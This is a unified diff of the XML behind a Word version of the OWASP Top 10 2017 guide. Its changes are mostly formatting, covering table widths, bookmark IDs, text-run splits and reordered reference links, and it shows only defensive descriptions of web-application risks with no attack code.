+        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="1773"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -4238,7 +4233,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="29" w:name="t10-owasp-top-10-2017-application-securi"/>
-      <w:bookmarkStart w:id="30" w:name="_Toc496719104"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc496914297"/>
       <w:bookmarkEnd w:id="29"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -4252,8 +4247,8 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2260"/>
-        <w:gridCol w:w="7100"/>
+        <w:gridCol w:w="2281"/>
+        <w:gridCol w:w="7295"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -4558,7 +4553,11 @@
               <w:t>A9:2017 U</w:t>
             </w:r>
             <w:r>
-              <w:t>sing Components with Known Vulnerabilities</w:t>
+              <w:t xml:space="preserve">sing Components with </w:t>
+            </w:r>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>Known Vulnerabilities</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4571,14 +4570,15 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or se</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">rver takeover. </w:t>
-            </w:r>
-            <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.</w:t>
+              <w:t xml:space="preserve">Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such </w:t>
+            </w:r>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>an attack can facilitate serious data loss or se</w:t>
+            </w:r>
+            <w:r>
+              <w:t>rver takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4624,7 +4624,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="31" w:name="a12017-injection"/>
-      <w:bookmarkStart w:id="32" w:name="_Toc496719105"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc496914298"/>
       <w:bookmarkEnd w:id="31"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -4638,9 +4638,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2861"/>
-        <w:gridCol w:w="3513"/>
-        <w:gridCol w:w="2986"/>
+        <w:gridCol w:w="2921"/>
+        <w:gridCol w:w="3605"/>
+        <w:gridCol w:w="3050"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -4953,7 +4953,11 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines. NB: SQL structure such as table names, colum</w:t>
+        <w:t xml:space="preserve">For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines. NB: SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>structure such as table names, colum</w:t>
       </w:r>
       <w:r>
         <w:t>n names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report writing software.</w:t>
@@ -4968,7 +4972,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.</w:t>
       </w:r>
     </w:p>
@@ -5345,7 +5348,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="39" w:name="a22017-broken-authentication"/>
-      <w:bookmarkStart w:id="40" w:name="_Toc496719106"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc496914299"/>
       <w:bookmarkEnd w:id="39"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -5359,9 +5362,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2793"/>
-        <w:gridCol w:w="3416"/>
-        <w:gridCol w:w="3151"/>
+        <w:gridCol w:w="2854"/>
+        <w:gridCol w:w="3498"/>
+        <w:gridCol w:w="3224"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -6113,7 +6116,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="47" w:name="a32017-sensitive-data-exposure"/>
-      <w:bookmarkStart w:id="48" w:name="_Toc496719107"/>
+      <w:bookmarkStart w:id="48" w:name="_Toc496914300"/>
       <w:bookmarkEnd w:id="47"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -6127,9 +6130,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2854"/>
-        <w:gridCol w:w="3406"/>
-        <w:gridCol w:w="3100"/>
+        <w:gridCol w:w="2914"/>
+        <w:gridCol w:w="3490"/>
+        <w:gridCol w:w="3172"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -6429,6 +6432,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Don't store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncati</w:t>
       </w:r>
       <w:r>
@@ -6456,7 +6460,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Encrypt all data in transit, such as using TLS. Enforce this using directives like HTTP Strict Transport Security (HSTS).</w:t>
       </w:r>
     </w:p>
@@ -6923,7 +6926,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="54" w:name="a42017-xml-external-entities-xxe"/>
-      <w:bookmarkStart w:id="55" w:name="_Toc496719108"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc496914301"/>
       <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -6940,9 +6943,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="3108"/>
-        <w:gridCol w:w="2773"/>
-        <w:gridCol w:w="3479"/>
+        <w:gridCol w:w="3189"/>
+        <w:gridCol w:w="2838"/>
+        <w:gridCol w:w="3549"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -7594,7 +7597,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="62" w:name="a52017-broken-access-control"/>
-      <w:bookmarkStart w:id="63" w:name="_Toc496719109"/>
+      <w:bookmarkStart w:id="63" w:name="_Toc496914302"/>
       <w:bookmarkEnd w:id="62"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -7608,9 +7611,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="3614"/>
-        <w:gridCol w:w="3046"/>
-        <w:gridCol w:w="2700"/>
+        <w:gridCol w:w="3707"/>
+        <w:gridCol w:w="3119"/>
+        <w:gridCol w:w="2750"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -7947,6 +7950,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Log access control failures, alert admins when ap</w:t>
       </w:r>
       <w:r>
@@ -7974,7 +7978,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Developers and QA staff should include functional access control unit and integration tests.</w:t>
       </w:r>
     </w:p>
@@ -8311,7 +8314,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="70" w:name="a62017-security-misconfiguration"/>
-      <w:bookmarkStart w:id="71" w:name="_Toc496719110"/>
+      <w:bookmarkStart w:id="71" w:name="_Toc496914303"/>
       <w:bookmarkEnd w:id="70"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -8325,9 +8328,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2587"/>
-        <w:gridCol w:w="3834"/>
-        <w:gridCol w:w="2939"/>
+        <w:gridCol w:w="2640"/>
+        <w:gridCol w:w="3926"/>
+        <w:gridCol w:w="3010"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -8697,6 +8700,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>A strong application architecture that provides effective, secure separa</w:t>
       </w:r>
       <w:r>
@@ -8712,7 +8716,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>An automated process to verify the effectiveness of the configurations and settings in all environments.</w:t>
       </w:r>
     </w:p>
@@ -8950,7 +8953,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="78" w:name="a72017-cross-site-scripting-xss"/>
-      <w:bookmarkStart w:id="79" w:name="_Toc496719111"/>
+      <w:bookmarkStart w:id="79" w:name="_Toc496914304"/>
       <w:bookmarkEnd w:id="78"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -8964,9 +8967,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2434"/>
-        <w:gridCol w:w="3735"/>
-        <w:gridCol w:w="3191"/>
+        <w:gridCol w:w="2476"/>
+        <w:gridCol w:w="3829"/>
+        <w:gridCol w:w="3271"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -9307,6 +9310,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Enabling a </w:t>
       </w:r>
       <w:hyperlink r:id="rId117">
@@ -9318,11 +9322,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>traversal ov</w:t>
+        <w:t xml:space="preserve"> is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path traversal ov</w:t>
       </w:r>
       <w:r>
         <w:t>erwrites, or vulnerable libraries in permitted sources, such as content delivery network or local libraries. </w:t>
@@ -9655,7 +9655,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="86" w:name="a82017-insecure-deserialization"/>
-      <w:bookmarkStart w:id="87" w:name="_Toc496719112"/>
+      <w:bookmarkStart w:id="87" w:name="_Toc496914305"/>
       <w:bookmarkEnd w:id="86"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -9669,9 +9669,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2582"/>
-        <w:gridCol w:w="4177"/>
-        <w:gridCol w:w="2601"/>
+        <w:gridCol w:w="2630"/>
+        <w:gridCol w:w="4295"/>
+        <w:gridCol w:w="2651"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -9996,6 +9996,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Restrict or monitor incoming and outgoing network connectivity from containers or servers that deserialize.</w:t>
       </w:r>
     </w:p>
@@ -10008,7 +10009,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Monitor deserialization, alerting if a user deserializes cons</w:t>
       </w:r>
       <w:r>
@@ -10022,7 +10022,7 @@
       <w:bookmarkStart w:id="90" w:name="example-attack-scenarios-6"/>
       <w:bookmarkEnd w:id="90"/>
       <w:r>
-        <w:t>Example Attack Scenarios​</w:t>
+        <w:t>Example Attack Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10196,7 +10196,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP AppSecUSA 2017: Friday the 13th JSON Attacks</w:t>
+          <w:t>OWASP AppSecUSA 2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>017: Friday the 13th JSON Attacks</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -10240,30 +10246,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="48"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId138">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>h</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ttps://github.com/mbechler/marshalsec</w:t>
+          <w:t>https://github.com/mbechler/marshalsec</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -10272,7 +10255,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="94" w:name="a92017-using-components-with-known-vulne"/>
-      <w:bookmarkStart w:id="95" w:name="_Toc496719113"/>
+      <w:bookmarkStart w:id="95" w:name="_Toc496914306"/>
       <w:bookmarkEnd w:id="94"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -10286,9 +10269,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2433"/>
-        <w:gridCol w:w="3862"/>
-        <w:gridCol w:w="3065"/>
+        <w:gridCol w:w="2474"/>
+        <w:gridCol w:w="3966"/>
+        <w:gridCol w:w="3136"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -10394,10 +10377,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>While it is easy to find already-written exploits for many known</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.</w:t>
+              <w:t>While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilitie</w:t>
+            </w:r>
+            <w:r>
+              <w:t>s require concentrated effort to develop a custom exploit.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10410,10 +10393,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Prevalence of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they us</w:t>
-            </w:r>
-            <w:r>
-              <w:t>e in their application or API, much less keeping them up to date. This issue is detectable by the use of scanners such as retire.js and header inspection, but verifying if it is exploitable requires an attack of some description.</w:t>
+              <w:t>Prevalence of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they use in their application or API, much le</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ss keeping them up to date. This issue is detectable by the use of scanners such as retire.js and header inspection, but verifying if it is exploitable requires an attack of some description.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10426,10 +10409,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>While some known vulnerabi</w:t>
-            </w:r>
-            <w:r>
-              <w:t>lities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list.</w:t>
+              <w:t>While some known vulnerabilities lead to only minor impacts, som</w:t>
+            </w:r>
+            <w:r>
+              <w:t>e of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10442,10 +10425,7 @@
       <w:bookmarkStart w:id="96" w:name="am-i-vulnerable-to-known-vulnerabilities"/>
       <w:bookmarkEnd w:id="96"/>
       <w:r>
-        <w:t>Am I Vulnerable to Know</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n Vulnerabilities?</w:t>
+        <w:t>Am I Vulnerable to Known Vulnerabilities?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10453,7 +10433,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>You are likely vulnerable:</w:t>
+        <w:t>You are likely vuln</w:t>
+      </w:r>
+      <w:r>
+        <w:t>erable:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10525,7 +10508,13 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>A6:2017-Security Misconfiguration</w:t>
+        <w:t>A6:2017-S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>ecurity Misconfiguration</w:t>
       </w:r>
       <w:r>
         <w:t>).</w:t>
@@ -10570,17 +10559,25 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Continuously inventory the versions of both client-side a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nd server-side components and their dependencies using tools like </w:t>
+        <w:t>Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId138">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>versions</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>, </w:t>
       </w:r>
       <w:hyperlink r:id="rId139">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>versions</w:t>
+          <w:t>DependencyCheck</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -10591,22 +10588,48 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>DependencyCheck</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>, </w:t>
+          <w:t>retire.js</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="50"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Continuously monitor sources like </w:t>
       </w:r>
       <w:hyperlink r:id="rId141">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>retire.js</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>, etc.</w:t>
+          <w:t>CVE</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t> and </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId142">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>NVD</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t> for vulnerabilities</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in your components. Use software composition analysis tools to automate the process.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10618,32 +10641,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Continuously monitor sources like </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId142">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>CVE</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t> and </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId143">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>NVD</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t> for vulnerabilities in your components. Use software composition analysis to</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ols to automate the process.</w:t>
+        <w:t>Only obtain your components from official sources and, when possible, prefer signed packages to reduce the chance of getting a modified, malicious component.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10655,25 +10653,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Only obtain your components from official sources and, when possible, prefer signed packages to reduce the chance of getting a modified, malicious component.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="50"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Many libraries and components do not create security patches for out </w:t>
-      </w:r>
-      <w:r>
-        <w:t>of support or old versions, or it simply be unmaintained. If patching is not possible, consider deploying a </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId144" w:anchor="What_is_a_Virtual_Patch.3F">
+        <w:t>Many librari</w:t>
+      </w:r>
+      <w:r>
+        <w:t>es and components do not create security patches for out of support or old versions, or it simply be unmaintained. If patching is not possible, consider deploying a </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId143" w:anchor="What_is_a_Virtual_Patch.3F">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10682,10 +10668,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> to monitor, detect </w:t>
-      </w:r>
-      <w:r>
-        <w:t>or protect against the discovered issue.</w:t>
+        <w:t xml:space="preserve"> to monitor, detect or protect against the discovered issue.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10693,7 +10676,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Every organization must ensure that there is an ongoing plan for monitoring, triaging, and applying updates or configuration changes for the lifetime of the application or portfolio.</w:t>
+        <w:t>Every organization must ensure that there is an ongoing plan for monitoring, triaging, and applying updates or configuration changes for the lifetime of the a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>pplication or portfolio.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10711,13 +10697,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Compone</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nts typically run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g. coding error) or intentional (e.g. backdoor in component). Some example exploitable component v</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ulnerabilities discovered are:</w:t>
+        <w:t>Components typically run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g. coding error) or intentional (e.g. bac</w:t>
+      </w:r>
+      <w:r>
+        <w:t>kdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10728,83 +10711,92 @@
           <w:numId w:val="51"/>
         </w:numPr>
       </w:pPr>
+      <w:hyperlink r:id="rId144">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>CVE-2017-5638</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">, a Struts 2 remote code execution vulnerability that enables execution of </w:t>
+      </w:r>
+      <w:r>
+        <w:t>arbitrary code on the server, has been blamed for significant breaches.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="51"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>While </w:t>
+      </w:r>
       <w:hyperlink r:id="rId145">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CVE-2017-5638</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>, a Struts 2 remote code execution vulnerability that enables execution of arbitrary code on the server, has been blamed for signifi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cant breaches.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="51"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>While </w:t>
+          <w:t>internet of things (IoT)</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> are frequently difficult or impossible to patch, the importance of patching them can </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">be great (eg: </w:t>
       </w:r>
       <w:hyperlink r:id="rId146">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>internet of things (IoT)</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> are frequently difficult or impossible to patch, the importance of patching them can be great (eg: </w:t>
+          <w:t>St. Jude pacemakers</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>There are automated tools to help attackers find unpatched or misconfigur</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ed systems. For example, the </w:t>
       </w:r>
       <w:hyperlink r:id="rId147">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>St. Jude pacemakers</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">There are automated tools to help attackers find unpatched or misconfigured systems. For example, the </w:t>
+          <w:t>Shodan IoT search engine</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> can help you find devices that still suffer from the </w:t>
       </w:r>
       <w:hyperlink r:id="rId148">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>Shodan IoT search engine</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> can help you find devices that still suffer from the </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId149">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
           <w:t>Heartbleed</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> vulnerability that was patched in April 2014.</w:t>
+        <w:t xml:space="preserve"> vulnerability that wa</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s patched in April 2014.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10839,10 +10831,7 @@
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK \h</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> </w:instrText>
+        <w:instrText xml:space="preserve"> HYPERLINK \h </w:instrText>
       </w:r>
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
@@ -10962,24 +10951,24 @@
           <w:numId w:val="52"/>
         </w:numPr>
       </w:pPr>
+      <w:hyperlink r:id="rId149">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Dependency Check (for Java and .NET libraries)</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="52"/>
+        </w:numPr>
+      </w:pPr>
       <w:hyperlink r:id="rId150">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
